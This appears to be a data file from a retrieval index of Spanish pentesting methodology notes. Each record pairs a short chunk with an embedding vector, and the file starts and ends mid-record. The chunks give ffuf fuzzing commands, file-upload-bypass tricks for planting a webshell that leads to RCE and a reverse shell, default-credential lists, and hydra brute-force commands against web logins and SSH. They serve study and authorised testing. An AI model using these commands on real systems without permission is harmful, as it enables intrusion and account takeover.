-0.06561, -0.00725, -0.01272, -0.02767, -0.00187, -0.0213, -0.0051, -0.06038, -0.00403, -0.03317, -0.05753, 0.04763, -0.01011, 0.01851, 0.00576, 0.01218, 0.04241, -0.01794, -0.06465, 0.00825, 0.01427, -0.00339, -0.07659, -0.01614, -0.05609, -0.09425, -0.00198, 0.00592, -0.07121, 0.06424, -0.01883, -0.01384, 0.02104, -0.05301, -0.00276, 0.01636, -0.00188, -0.01865, 0.0028, -0.07015, -0.02763, -0.01245, 0.04272, 0.03499, 0.01018, -0.00526, 0.03898, 0.04189, 0.02524, 0.01356, 0.0337, 0.05628, 0.01453, 0.05424, 0.03356, -0.05692, 0.03975, 0.00207, -0.07518, 0.05125, -0.01975, -0.01798, -0.00243, -0.03157, -0.0745, -0.01612, 0.06934, -0.06658, -0.00056, -0.02183, -0.03802, -0.07243, 0.00312, 0.00808, -0.01019, -0.0689, -0.06612, -0.05208, -0.11982, 0.07579, -0.04763]} +{"tipo": "metodologia", "herramienta": "Content discovery", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "texto": "## Más allá de directorios\n```bash\nffuf -u http://IP/page.php?FUZZ=test -w params.txt # descubrir parámetros (o usa arjun)\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP -w subs.txt # vhosts → Vhosts y subdominios\n```", "v": [0.03634, -0.1404, -0.12933, -0.04639, 0.12398, -0.11699, -0.05954, -0.20503, 0.07929, 0.12414, -0.07377, -0.04377, -0.0571, 0.08933, 0.00968, -0.00702, 0.11231, -0.02011, -0.03861, -0.08928, 0.08404, 0.12526, -0.15703, -0.03291, -0.10275, -0.01631, -0.12319, 0.05193, -0.1949, -0.18394, 0.15349, -0.1741, -0.11591, 0.03698, -0.13464, -0.05465, 0.00755, 0.11087, 0.0522, 0.23792, 0.04184, 0.10346, -0.0425, 0.09952, -0.02344, -0.03579, -0.07386, -0.08186, 0.05423, -0.1184, 0.03288, -0.09556, -0.00887, 0.0783, -0.03694, -0.07421, 0.01666, -0.09471, -0.04015, 0.00013, 0.02664, 0.00168, -0.01459, -0.07057, -0.00062, 0.0063, -0.03688, -0.00489, -0.11001, 0.00643, -0.05341, 0.04901, 0.01802, -0.06966, 0.0608, 0.03741, 0.04649, -0.0887, 0.10073, 0.02444, -0.0393, 0.02753, -0.09957, -0.01839, -0.05941, -0.05979, 0.07634, -0.08984, -0.00827, -0.05666, 0.096, 0.02658, -0.0475, 0.02054, 0.05978, -0.08371, 0.06067, 0.05487, 0.09374, -0.01265, 0.01657, 0.07533, -0.0761, 0.05571, 0.13107, 0.03008, 0.01154, 0.03609, 0.05992, 0.03454, 0.10462, -0.01433, 0.03845, -0.06289, -0.06712, -0.10002, -0.07921, 0.03971, 0.02457, -0.07194, -0.03416, -0.01153, -0.00133, 0.04557, -0.01874, 0.00798, 0.03303, 0.01659, 0.02987, 0.01589, 0.0472, -0.01655, -0.01094, 0.03525, 0.0024, 0.08333, 0.05463, 0.05353, -0.01731, -0.01577, 0.01329, 0.01272, 0.00347, 0.10192, 0.08823, -0.03125, 0.00464, -0.12213, -0.03249, 0.03513, 0.02658, 0.0781, 0.03344, -0.02169, -0.01527, 0.00897, 0.08498, -0.04304, -0.01299, 0.00458, 0.02015, 0.01802, 0.00892, 0.01692, -0.01333, 0.00673, -0.0212, -0.00707, 0.03483, -0.01793, -0.00423, 0.06329, -0.06258, -0.06128, 0.03549, -0.00257, 0.05275, -0.0742, 0.03716, -0.01964, 0.06038, 0.01571, -0.02468, 0.03736, -7e-05, -0.02222, 0.06417, -0.00498, -0.00102, -0.01452, 0.05313, 0.00141, -0.05822, 0.03536, 0.02367, 0.0269, -0.06439, -0.02106, -0.02753, -0.06479, -0.09109, 0.03115, -0.02649, -0.0105, 0.00713, -0.0433, -0.01712, 0.02483, -0.04717, -0.06034, 0.03607, -0.0476, 0.04911, -0.0326, -0.04876, 0.03664, -0.00765, 0.02789, 0.00881, -0.00028, -0.04304, 0.0511, 0.03325, -0.01194, -0.02897, -0.00577, 0.05487, 0.02566, 0.01685, 0.02272, -0.0382, 0.02245, -0.01634, 7e-05, 0.06139, -0.00368, -0.01961, 0.02554, -0.01712, -0.04417, -0.02542, -0.0037, -0.00555, -0.04046, -0.04026, -0.04646, -0.09698, 0.04243, -0.00127, -0.01379, -0.01938, -0.02604, -0.03433, -0.05729, 0.00064, 0.00643]} +{"tipo": "metodologia", "herramienta": "Content discovery", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "texto": "## Qué hacer con lo encontrado\nCada ruta nueva = superficie nueva → vuelve a Hacking web y pruébala (login → Authentication attacks, `?file=` → Directory traversal, upload → File upload bypass).\n\nRelacionado: Burp Suite · Enumeración web · OSCP MOC", "v": [-0.22623, -0.00888, -0.15088, -0.18108, 0.00281, -0.1865, 0.00317, -0.07139, -0.07033, -0.02783, -0.11205, -0.19569, -0.05706, 0.05036, -0.03222, -0.06179, -0.00406, -0.01902, 0.03492, -0.10173, -0.04733, 0.07142, -0.05962, 0.00659, 0.00853, -0.05583, -0.02534, 0.05367, -0.14772, -0.1576, 0.06947, 0.029, -0.00473, 0.04152, -0.05121, -0.07603, -0.00531, 0.01556, 0.0277, 0.05222, -0.07023, 0.08225, -0.15586, 0.16118, 0.02938, -0.04889, 0.03999, -0.02329, 0.01561, -0.02779, 0.02573, -0.04964, -0.18726, 0.03417, 0.05801, -0.08439, 0.1253, 0.00029, -0.00409, -0.03152, 0.01827, 0.1071, -0.09705, -0.08307, -0.0041, -0.14348, -0.05529, -0.07188, -0.06086, 0.11742, 0.03049, 0.08662, 0.0677, -0.0224, -0.03708, -0.09849, 0.02825, 0.00055, 0.15686, 0.0583, 0.07075, -0.00288, -0.02199, -0.00704, -0.13672, -0.08717, 0.06866, -0.05292, 0.01509, -0.03203, 0.1368, 0.00296, -0.00977, -0.04129, 0.03079, -0.07141, -0.01348, -0.0496, 0.02238, -0.12123, -0.04221, 0.00259, -0.00835, 0.11183, 0.00383, 0.06251, -0.01744, -0.00748, -0.03719, 0.04355, 0.05904, -0.01471, 0.03624, -0.11582, -0.06852, 0.0004, -0.02857, 0.01542, -0.03635, -0.00578, -0.08376, -0.06902, 0.0084, 0.05719, -0.09532, -0.01601, -0.0516, 0.04902, -0.01834, 0.06736, -0.04893, -0.02167, -0.0687, -0.02925, -0.08903, -0.07995, 0.02338, 0.08291, 0.01933, -0.00943, -0.00619, 0.02078, -0.01414, -0.00219, -0.025, 0.00869, -0.00539, -0.0877, -0.09415, 0.01199, 0.02852, 0.07468, -0.02109, 0.00582, 0.06066, 0.06836, -0.05539, -0.10114, -0.03569, 0.00701, 0.03492, 0.09625, -0.09052, 0.00539, -0.0214, -0.00545, -0.07461, 0.00105, 0.03067, -0.04583, 0.01444, 0.02248, -0.02175, -0.04534, 0.0333, -0.06234, 0.0803, -0.10388, 0.04374, -0.03897, -0.01716, -0.06017, 0.05611, 0.0409, -0.00809, -0.0771, 0.08832, 0.0459, -0.02005, 0.02819, 0.03484, 0.01088, -0.00654, 0.02563, -0.00398, -0.05911, -0.01867, -0.02872, -0.01362, 0.06256, -0.01861, -0.06387, -0.06746, -0.07961, 0.06227, 0.02277, 0.04902, -0.03628, -0.06467, 0.00925, 0.02233, 0.00289, 0.06072, -0.06183, -0.02316, 0.00056, 0.07489, 0.02021, -0.04312, 0.03919, -0.01975, 0.06525, 0.03403, -0.00514, 0.04178, 0.03796, -0.00303, -0.06621, -0.01401, -0.00164, -0.00762, -0.00089, 0.01002, -0.05367, 0.0449, 0.03068, -0.03528, -0.01252, -0.09447, -0.00597, -0.00358, 0.0205, 0.00751, -0.03774, -0.05844, -0.05957, -0.01302, 0.02373, 0.01029, -0.03467, -0.01697, -0.00947, -0.01141, -0.02641, -0.0254, 0.01479]} +{"tipo": "metodologia", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "texto": "# File upload bypass\n\n> Subir una webshell cuando el upload está \"filtrado\". Vector de Hacking web. Manipula la subida con Burp Suite.", "v": [0.10884, -0.03557, -0.22469, -0.17085, -0.03877, -0.07901, -0.12198, -0.06302, 0.08497, -0.0646, -0.05725, -0.08838, -0.01109, -0.02208, -0.00513, -0.07916, -0.11725, -0.22723, 0.0078, 0.00872, 0.12189, 0.1852, 0.01646, -0.10607, -0.01708, 0.01452, 0.00111, 0.0911, -0.17315, -0.16758, 0.0493, 0.0191, -0.05279, 0.06141, -0.06839, -0.06319, -0.09766, -0.00622, 0.04872, -0.01176, -0.03557, 0.08354, -0.14997, 0.0445, -0.04415, -0.02724, 0.02148, -0.05809, 0.09424, 0.07535, 0.03119, -0.02192, -0.12092, 0.06292, -0.08571, -0.0973, 0.11984, -0.12377, 0.00823, -0.06161, 0.01424, 0.09916, 0.01739, -0.00912, -0.04553, -0.11183, -0.06393, -0.09984, -0.00056, 0.03032, 0.03153, 0.02816, 0.11835, 0.06549, -0.01171, -0.08629, -0.01695, -0.06089, -0.02191, 0.01148, -0.02292, -0.01737, -0.05568, 0.05886, -0.13808, -0.05101, 0.00185, -0.06359, -0.05887, -0.0089, 0.11537, -0.04428, 0.10437, -0.06348, 0.01964, -0.1286, 0.03767, -0.01178, 0.01615, -0.10102, 0.0432, -0.0482, -0.01974, 0.11394, 0.05049, 0.12451, 0.04578, 0.0033, 0.02298, 0.01822, 0.01558, 0.03213, 0.02475, -0.05314, -0.04372, 0.00127, 0.03501, 0.03994, -0.02003, -0.09115, -0.03883, -0.07438, 0.00386, 0.02954, -0.02736, 0.00238, -0.0426, 0.04277, -0.01567, -0.04458, -0.11118, 0.08618, -0.01211, 0.00966, 0.00281, -0.01822, 0.0418, -0.02179, -0.00403, -0.07424, -0.02855, 0.05392, -0.03492, 0.00183, 0.00723, 0.01215, 0.00043, -0.08512, -0.09654, -0.0549, 0.02493, -0.06425, -0.00328, 0.01961, 0.02705, 0.0511, -0.00758, -0.10742, -0.02111, 0.00687, -0.04551, 0.01952, -0.0248, 0.02221, -0.0303, 0.04678, -0.03835, -0.00603, -0.03143, -0.03053, -0.02912, 0.06929, -0.01972, -0.06554, 0.06606, -0.0578, 0.00059, -0.07122, 0.03119, -0.04492, 0.02845, 0.02904, 0.09323, 0.02873, -0.09205, -0.03997, 0.0117, -0.00943, 0.01456, 0.04171, -0.02921, 0.00613, -0.06432, 0.04711, 0.02503, -0.00672, -0.0863, -0.0511, 0.07214, 0.0324, -0.03616, -0.05124, -0.03244, -0.05527, -0.05704, 0.01494, 0.05532, -0.0585, -0.06825, 0.07012, -0.00535, -0.03268, 0.04878, -0.09985, 0.00671, 0.04881, 0.07201, 0.00586, -0.04265, -0.01842, -0.02959, 0.04735, 0.07608, 0.01457, -0.04187, 0.01425, 0.01881, 0.04191, -0.02708, 0.04484, -0.02974, 0.03219, -0.00062, -0.01114, -0.00072, 0.0539, 0.02549, 0.02818, -0.09425, -0.02008, 0.04292, 0.02775, 0.02179, -0.05956, -0.04844, -0.06807, -0.03695, -0.0086, 0.04428, -0.00849, -0.02826, -0.02018, -0.05274, -0.05658, 0.02238, -0.00716]} +{"tipo": "metodologia", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "texto": "## Trucos\n```\nDoble extensión → shell.php.jpg, shell.phtml, .phar, .pht\nMagic bytes → GIF89a;\nContent-Type → Burp: cambiar a image/jpeg\n.htaccess → reasignar el handler para que .jpg se ejecute como PHP\n```", "v": [-0.01829, -0.06943, 0.02678, -0.09927, 0.05871, -0.15371, -0.02914, -0.03267, 0.1061, 0.0586, -0.04845, 0.10671, -0.05039, -0.06077, 0.03259, -0.09141, -0.06396, -0.08091, -0.04327, -0.03653, -0.00947, 0.08797, -0.13285, -0.2231, -0.09798, 0.03842, -0.0853, 0.15317, -0.16197, -0.06557, 0.16156, -0.08514, -0.03675, 0.0144, -0.19313, 0.08249, 0.07582, 0.01381, -0.02756, 0.15155, -0.07244, 0.1011, -0.14654, 0.16467, -0.03763, -0.10008, 0.04869, -0.04229, 0.06338, -0.08379, 0.05507, 0.00609, -0.21151, 0.09342, 0.02929, -0.01019, 0.1151, -0.17255, -0.08623, 0.02872, -0.03802, 0.07407, -0.04018, -0.08385, 0.03572, 0.07978, 0.08936, 0.00861, -0.04379, 0.07364, -0.08995, 0.03985, -0.03694, -0.04138, 0.00372, 0.02843, 0.02277, -0.09251, 0.04128, 0.04134, -0.10211, -0.04052, -0.12396, 0.0095, -0.05, -0.09447, -0.02636, -0.06523, 0.0069, -0.04697, 0.18604, -0.00298, 0.00528, 0.04957, 0.00644, -0.08406, -0.0592, -0.01636, -0.00443, -0.02346, 0.01083, 0.02529, -0.04422, -0.00173, 0.14036, 0.02137, 0.06941, 0.03994, -0.01273, -0.02495, 0.10257, -0.02238, 0.0379, -0.00698, -0.07914, -0.0208, -0.0045, 0.02168, 0.02378, -0.08995, -0.0342, -0.08217, -0.08081, 0.05916, 0.0073, -0.00068, 0.01627, 0.03506, -0.072, -0.01252, 0.00868, -0.00509, -0.03554, -0.02218, -0.06855, 0.07145, 0.09415, 0.0519, -0.00599, -0.01224, -0.03314, 0.03089, -0.00482, 0.04417, 0.052, 0.00805, 0.01578, -0.03164, -0.0528, 0.02725, 0.06194, 0.01036, 0.03177, -0.04731, -0.03143, 0.01149, -0.01757, -0.00615, -0.04007, -0.01604, 0.00581, 0.05623, 0.13887, 0.01775, -0.04146, -0.06358, -0.07936, 0.01313, 0.03657, -0.02781, 0.03162, 0.0028, -0.05979, -0.04291, 0.01471, 0.0012, -0.01989, -0.03691, -0.00225, 0.00131, 0.05477, -0.0415, 0.03339, 0.08023, -0.01736, -0.01316, 0.06128, 0.02956, -0.063, -0.01884, -0.0128, 0.01855, 0.02607, 0.01458, 0.05375, 0.04428, -0.03466, -0.03739, 0.0306, 0.03127, -0.04717, 0.03428, 0.03818, -0.00771, 0.04666, -0.06532, 0.05851, 0.0479, -0.06769, -0.02694, 0.01005, -0.01159, 0.0189, 0.0018, 0.01205, -0.00469, -0.00652, 0.09659, 0.03667, -0.01538, -0.03399, 0.09421, 0.02576, -0.0079, -0.0041, 0.00776, 0.01313, 0.01515, -0.01531, -0.00754, -0.02356, 0.01509, -0.00735, -0.01823, 0.0177, -0.02202, -0.04868, 0.0035, -0.0339, -0.06979, 0.0077, 0.02398, -0.02793, -0.0147, -0.01221, -0.06959, -0.04543, -0.0178, 0.01387, -0.00379, -0.06464, -0.0068, -0.04348, -0.0545, -0.03345, -0.00661]} +{"tipo": "metodologia", "herramienta": "File upload bypass", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/File upload bypass.md", "texto": "## Flujo\n1. Subes la webshell evadiendo el filtro.\n2. La localizas (fuzzing de `/uploads/` → Enumeración web).\n3. `?c=...` → RCE → lanzas Reverse shell.", "v": [0.09701, -0.12711, -0.08166, 0.02051, 0.02288, -0.00881, -0.14355, -0.03434, 0.11991, 0.02946, -0.19948, -0.12478, -0.11016, -0.04303, 0.02389, 0.05583, -0.14642, 0.03355, -0.12386, -0.07522, -0.12407, -0.0211, -0.24072, -0.13283, -0.03523, 0.02729, -0.01944, 0.00198, 0.02768, -0.09408, 0.05674, 0.04264, 0.03374, 0.08422, -0.01921, 0.09033, 0.04205, -0.0423, 0.01274, 0.08854, 0.01167, 0.0677, -0.19509, 0.1386, -0.12028, -0.16402, 0.02828, -0.10783, 0.05988, 0.01846, 0.0189, -0.05222, -0.11606, 0.0719, 0.02868, -0.05521, 0.09604, -0.05533, -0.07077, -0.04975, 0.09518, 0.06588, 0.04745, -0.0586, -0.04258, -0.03389, -0.01392, 0.00709, 0.01847, 0.04305, 0.08727, -0.00935, 0.02316, -0.116, 0.01023, 0.04514, 0.02995, 0.03289, 0.07329, 0.04411, -0.05325, -0.0075, 0.02207, -0.03667, 0.05004, 0.03748, 0.03815, -0.19409, -0.01705, 0.02478, -0.00079, 0.03402, -0.01805, -0.04245, 0.02171, -0.07402, 0.01555, 0.03951, -0.03438, -0.10692, -0.02023, 0.01084, -0.07924, 0.08835, 0.06425, 0.01912, 0.00136, -0.05282, -0.02887, 0.03655, 0.06258, -0.01703, 0.05704, -0.05146, -0.04097, 0.08105, 0.03342, -0.04161, 0.10056, -0.04126, 0.07541, -0.06632, -0.02077, -0.07189, -0.0459, 0.055, -0.03238, -0.02714, 0.0333, -0.0466, 0.04018, 0.05859, -0.04075, 0.04447, -0.05455, 0.03738, 0.0091, 0.04963, 0.02728, -0.02756, -0.00547, 0.01375, -0.04183, 0.09996, 0.05249, 0.02061, 0.05462, -0.05269, -0.1303, 0.01839, -0.00773, 0.0369, -0.04348, 0.03649, 0.02438, 0.01457, 0.01612, -0.05073, -0.07754, -0.02845, 0.04308, 0.06137, 0.04799, 0.0274, -0.03696, 0.02555, -0.05141, -0.01356, -0.04789, -0.06434, 0.04095, -0.02508, -0.0525, -0.07071, -0.01666, 0.01078, 0.03154, -0.10237, 0.038, 0.0294, 0.07115, -0.04087, -0.03343, 0.0786, 0.02091, -0.02425, -0.00315, -0.01003, -0.05162, 0.0181, 0.05787, -0.07892, -0.04112, 0.05393, 0.04462, -0.02249, 0.02033, -0.12924, 0.00184, -0.0458, -0.07491, -0.03509, -0.03844, -0.05875, -0.03836, 0.01436, 0.02954, -0.09011, 0.00222, -0.03999, -0.06986, -0.01435, -0.00629, -0.00164, 0.02459, -0.03736, 0.05058, 0.07187, -0.00293, 0.01724, 0.0009, 0.06174, -0.02401, -0.00571, -0.02553, 0.04684, 0.06236, -0.06333, 0.02016, -0.03052, -0.0668, -0.03791, 0.0338, -0.02814, -0.10879, -0.02356, 0.05182, 0.01194, -0.03235, -0.03617, -0.00703, 0.00578, 0.04297, -0.0009, 0.00782, -0.02795, -0.04002, -0.06133, 0.00915, -0.0044, -0.08158, -0.01175, -0.1634, -0.06054, 0.05171, 0.02228]} +{"tipo": "metodologia", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "texto": "# Authentication attacks\n\n> Romper logins web: credenciales por defecto, fuerza bruta y bypass. Casi siempre el primer intento en Hacking web.", "v": [-0.04085, -0.06282, -0.1106, -0.06324, 0.01201, -0.02094, 0.03666, 0.07522, -0.05943, -0.01966, -0.07924, -0.04894, -0.18296, 0.16965, 0.09599, -0.02588, -0.04085, -0.02443, 0.00262, -0.11938, -0.03363, -0.12971, 0.00951, -0.05987, 0.04881, -0.05375, -0.03037, 0.16092, -0.13523, -0.02606, 0.04473, 0.0408, 0.08694, -0.02893, -0.06183, -0.05229, -0.12129, 0.02774, 0.16026, 0.238, 0.03115, 0.07698, -0.05807, 0.03081, 0.07293, -0.00352, 0.0124, 0.03902, -0.01488, -0.0434, -0.0144, -0.06979, -0.16172, -0.05706, -0.09359, -0.10171, 0.10711, 0.00754, -0.08152, -0.07643, -0.04191, 0.0908, 0.03296, 0.00833, 0.00959, -0.09536, -0.13576, -0.08949, -0.02306, 0.12619, -0.11389, -0.06108, 0.04552, 0.02314, 0.03741, -0.12617, 0.0695, 0.00592, 0.06375, -0.02383, 0.02385, 0.00891, -0.08148, 0.00841, -0.09064, 0.00712, 0.04618, -0.0062, -0.07537, 0.04016, 0.08364, 0.05959, -0.0189, -0.05263, -0.03089, -0.02457, -0.0286, -0.00419, 0.04067, -0.1583, -0.07917, -0.08598, -0.06662, 0.04446, 0.06961, -0.03282, 0.01625, 0.10729, 0.04537, -0.0354, -0.04202, -0.06205, -0.08052, -0.01264, 0.06037, 0.08877, -0.05314, -0.05405, 0.01871, -0.05277, -0.08605, -0.07788, -0.04352, -0.00479, -0.06779, 0.08673, -0.06124, 0.06661, -0.01588, -0.03501, -0.01044, -0.03822, 0.04717, 0.00375, 0.00363, 0.06332, 0.05699, -0.10643, -0.0272, 0.01467, 0.01305, 0.01424, -0.0003, -0.00997, 0.02764, 0.08256, -0.01365, 0.01037, -0.11924, -0.03537, -0.00025, 0.08936, 0.01246, 0.08697, -0.10287, -0.01341, 0.04322, -0.07554, 0.01937, 0.04731, -0.08724, 0.0232, -0.02134, 0.00951, -0.06189, -0.05155, -0.05507, 0.02454, 0.0246, -0.04577, 0.00475, 0.03398, -0.00757, -0.03921, 0.01373, 0.01886, 0.03493, -0.03301, -0.01804, -0.01462, 0.04645, -0.00372, 0.0456, 0.04744, -0.03814, -0.01668, 0.04371, 0.02054, -0.0279, 0.02755, 0.05394, -0.03493, -0.04682, 0.136, 0.04462, -0.00224, -0.05453, -0.05066, 0.03315, 0.06376, -0.01578, -0.06384, -0.03144, 0.00301, 0.0458, 0.06489, 0.06584, -0.09465, -0.06642, 0.05081, 0.0638, -0.03938, 0.03855, -0.12615, -0.08348, 0.04079, 0.04613, -0.0318, -0.04953, -0.03439, 0.00444, 0.0252, -0.00948, 0.04995, 0.04686, 0.02721, 0.03669, -0.08602, 0.01577, 0.07235, 0.02445, -0.06974, -0.02967, -0.00179, -0.04481, -0.00565, 0.03004, 0.04237, -0.09406, -0.01574, -0.05551, -0.01354, 0.01851, -0.07012, -0.06755, -0.03077, -0.03521, 0.02555, -0.01257, -0.02635, -0.01533, -0.00641, -0.00376, -0.03573, 0.05466, -0.02681]} +{"tipo": "metodologia", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "texto": "## 1. Lo gratis primero\n- **Credenciales por defecto**: `admin:admin`, `admin:password`, `root:root`, las del CMS/producto (búscalas: `searchsploit ` o Google).\n- **Reutilización**: cualquier credencial que pillaste antes (Metodología OSCP).", "v": [-0.06431, -0.15459, -0.06356, -0.12838, 0.01679, -0.24349, -0.00436, -0.00502, -0.17433, 0.00982, -0.1045, -0.07729, 0.02708, -0.0668, 0.03767, -0.15828, -0.02158, -0.0297, 0.00489, -0.00296, -0.06887, -0.11692, -0.17246, -0.04404, -0.0125, 0.14734, 0.07624, 0.04307, -0.02492, 0.04188, 0.07423, -0.06042, -0.08268, 0.00147, -0.14248, 0.0604, -0.02688, -0.0336, -0.01841, 0.27391, -0.07489, -0.01943, -0.04042, 0.1618, 0.00579, -0.08046, 0.16344, -0.04367, -0.04655, -0.07144, 0.01061, -0.17884, -0.11158, -0.05916, 0.08126, -0.04166, 0.05428, -0.0777, -0.0943, -0.02026, -0.04328, 0.10939, 0.00316, -0.01881, -0.02115, 0.00668, 0.03064, -0.03969, -0.06211, 0.13316, -0.00843, -0.03973, -0.07038, -0.08097, 0.11005, -0.0181, 0.0959, 0.08945, 0.16052, 0.01505, 0.04189, -0.09088, 0.03829, -0.02718, -0.02249, -0.03957, 0.06697, -0.03965, -0.09574, -0.01073, 0.12088, -0.01064, -0.02771, 0.00964, 0.02296, -0.10863, 0.04154, -0.06679, -0.02532, 0.04356, -0.00881, 0.09772, 0.0391, 0.10908, 0.06349, -0.05696, 0.03486, 0.02986, 0.0187, -0.12765, 0.06037, -0.02141, 0.01717, 0.05412, -0.03325, 0.05907, -0.04899, 0.02731, -0.01985, -0.05697, 0.03915, -0.02859, -0.05057, -0.00899, 0.01411, -0.00062, -0.0408, 0.05835, -0.0177, -0.03995, 0.0319, -0.03869, -0.00517, 0.06977, -0.01995, 0.05164, -0.00699, -0.03889, 0.00884, -0.00566, -0.02023, -0.05075, 0.03018, -0.00631, 0.08262, 0.00474, -0.0245, -0.06493, -0.00651, -0.01821, 0.00835, 0.04981, 0.038, 0.0326, -0.03039, 0.00655, -0.00151, -0.0458, -0.00715, 0.03274, -0.02907, -0.03908, 0.06468, 0.07063, -0.07557, -0.06666, 0.01522, -0.0221, -0.03287, -0.02522, -0.00883, 0.02941, -0.04676, -0.04904, -0.01882, -0.004, 0.04109, -0.09597, -0.00266, -0.06249, 0.05387, -0.0021, 0.00157, 0.01366, 0.02529, -0.05052, 0.00638, 0.00739, -0.00252, 0.00411, 0.08363, -0.02218, 0.01022, 0.01762, 0.00352, -0.00249, -0.03141, -0.05279, -0.02235, 0.01667, -0.03, -0.01416, -0.00419, -0.06867, 0.01505, -0.07853, 0.10395, 0.00427, -0.09766, 0.04662, -0.06699, -0.03138, 0.03335, 0.01392, -0.01697, -0.03309, -0.04596, 0.06768, -0.01494, -0.01906, 0.04542, 0.05988, 0.05175, 0.0734, 0.01064, -0.03538, 0.02726, -0.06581, 0.00227, 0.02789, -0.05047, 0.00542, 0.00513, -0.06383, 0.05882, -0.05836, 0.05301, 0.01486, -0.00454, -0.02302, -0.0041, 0.00844, -0.01428, 0.00455, -0.0628, -0.05085, 0.00455, -0.01625, 0.01076, -0.02519, -0.00989, -0.05729, -0.04119, -0.07039, 0.01228, 0.01176]} +{"tipo": "metodologia", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "texto": "# Formulario POST: necesitas el campo y el mensaje de fallo\nhydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form \\\n \"/login.php:user=^USER^&pass=^PASS^:Invalid credentials\"", "v": [0.04292, -0.03791, -0.14593, -0.14527, 0.06025, -0.25604, -0.03969, -0.16185, 0.02202, 0.06582, -0.05701, -0.11355, 0.08334, -0.06191, -0.05248, -0.10858, 0.01553, 0.11427, 0.08089, -0.04947, 0.01499, 0.18139, -0.12751, -0.0296, -0.11692, 0.06518, -0.079, -0.06993, -0.10687, -0.1009, 0.08238, -0.07842, -0.13444, -0.04122, -0.10226, 0.02957, -0.00215, 0.13507, -0.05536, 0.27605, -0.04649, 0.11669, 0.00376, 0.09078, -0.03288, -0.05901, 0.01751, 0.00723, 0.13058, -0.07404, 0.04614, -0.08997, -0.09874, 0.02047, -0.02862, -0.01484, 0.12135, -0.1131, -0.0269, 0.06249, -0.08151, 0.07625, -0.11898, 0.04146, -0.07091, 0.03676, 0.03008, -0.04927, -0.11478, 0.1004, 0.03042, -0.02141, -0.01065, -0.0339, 0.02447, -0.03052, 0.01286, -0.04116, 0.06057, 0.07508, -0.05189, -0.07589, -0.07429, -0.04005, -0.07302, -0.03196, 0.09943, -0.02862, 0.01847, -0.03627, 0.0647, -0.0449, -0.01373, 0.0192, 0.05095, -0.12217, -0.11906, 0.01177, 0.00766, -0.06626, -0.05415, 0.07536, -0.03131, -0.02122, 0.06185, 0.00638, 0.0355, 0.05977, 0.0521, 0.00432, 0.11211, -0.08485, 0.01516, -0.01184, 0.05867, -0.01682, -0.11048, -0.01775, -0.05341, -0.04421, -0.02462, -0.01947, 0.02572, -0.0696, 0.01304, 0.00084, 0.04629, 0.06871, -0.06578, 0.04898, -0.05902, -0.00912, -0.0804, -0.00501, 0.02747, 0.09318, 0.03246, 0.03048, -0.03648, 0.05159, -0.00987, 0.0004, -0.02112, 0.03207, 0.01223, 0.03906, -0.03214, -0.09997, -0.11107, -0.05301, 0.03653, 0.05808, -0.00562, -0.00206, -0.02986, -0.02301, 0.09098, -0.00871, -0.00975, 0.05119, -0.09352, 0.02482, 0.00849, 0.0211, -0.06264, -0.03833, -0.01383, -0.00705, -0.00773, -0.07554, 0.02369, -0.02995, 0.00288, -0.08343, 0.01856, -0.01069, 0.0581, 0.00126, 0.02569, 0.00642, 0.06075, -0.04084, 0.01728, 0.05312, -0.01725, -0.00503, 0.01804, -0.02262, 0.01437, 0.04209, 0.05343, 0.02498, -0.01041, 0.04968, 0.00178, 0.04799, -0.05417, -0.05352, 0.02605, -0.04663, -0.00156, 0.00235, -0.02001, -0.00622, 0.0045, -0.04634, -0.02101, 0.00496, -0.01937, -0.00444, 0.07677, -0.05892, 0.04695, -0.02453, -0.03538, -0.01642, 0.02407, 0.04439, 0.01234, -0.01261, -0.01128, 0.06003, -0.02188, 0.0072, -0.00728, 0.00882, -0.03627, -0.01233, 0.02183, 0.029, -0.05157, 0.01436, -0.03897, -0.04789, 0.06813, -0.01362, -0.01767, -0.01755, -0.03479, -0.04723, 0.05055, 0.01284, 0.03774, -0.03222, -0.05925, -0.019, -0.07054, 0.02224, 0.03954, -0.01729, -0.02107, -0.05841, -0.03911, -0.05718, -0.0111, -0.03793]} +{"tipo": "metodologia", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "texto": "# SSH (si hay user válido):\nhydra -l bob -P rockyou.txt ssh://IP\n```\n- El `:F=mensaje` o `:S=éxito` es lo que distingue fallo de acierto → cógelo en Burp Repeater e Intruder.", "v": [0.02106, -0.11738, -0.19409, 0.04042, 0.09806, -0.26653, -0.09959, -0.26545, 0.10483, 0.11119, -0.09227, 0.01806, 0.12139, -0.0876, -0.01239, -0.05244, -0.10907, -0.00813, -0.07415, -0.03588, 0.06869, 0.17754, -0.10947, -0.04494, 0.05577, 0.02605, -0.14502, 0.20658, -0.06067, -0.02918, 0.0629, -0.05466, -0.01666, -0.08478, -0.10662, 0.05464, 0.04735, 0.0709, 0.0159, 0.19529, -0.03547, 0.00792, -0.0385, 0.05609, 0.04506, -0.04492, 0.04803, 0.04526, 0.05717, 0.03801, -0.01669, -0.0804, -0.09745, -0.03084, -0.01388, -0.00933, 0.07144, -0.04444, 0.00962, -0.03465, -0.08975, 0.02899, -0.06351, -0.048, -0.05335, -0.10911, 0.04058, -0.04796, -0.02651, -0.01183, -0.03782, 0.04644, 0.00363, 0.0638, 0.02958, 0.01208, -0.00021, 0.04881, 0.07381, 0.02094, -0.09132, -0.14086, -0.08302, -0.09185, -0.05465, -0.08869, 0.11462, -0.14163, 0.06599, -0.04889, 0.0096, 0.06859, 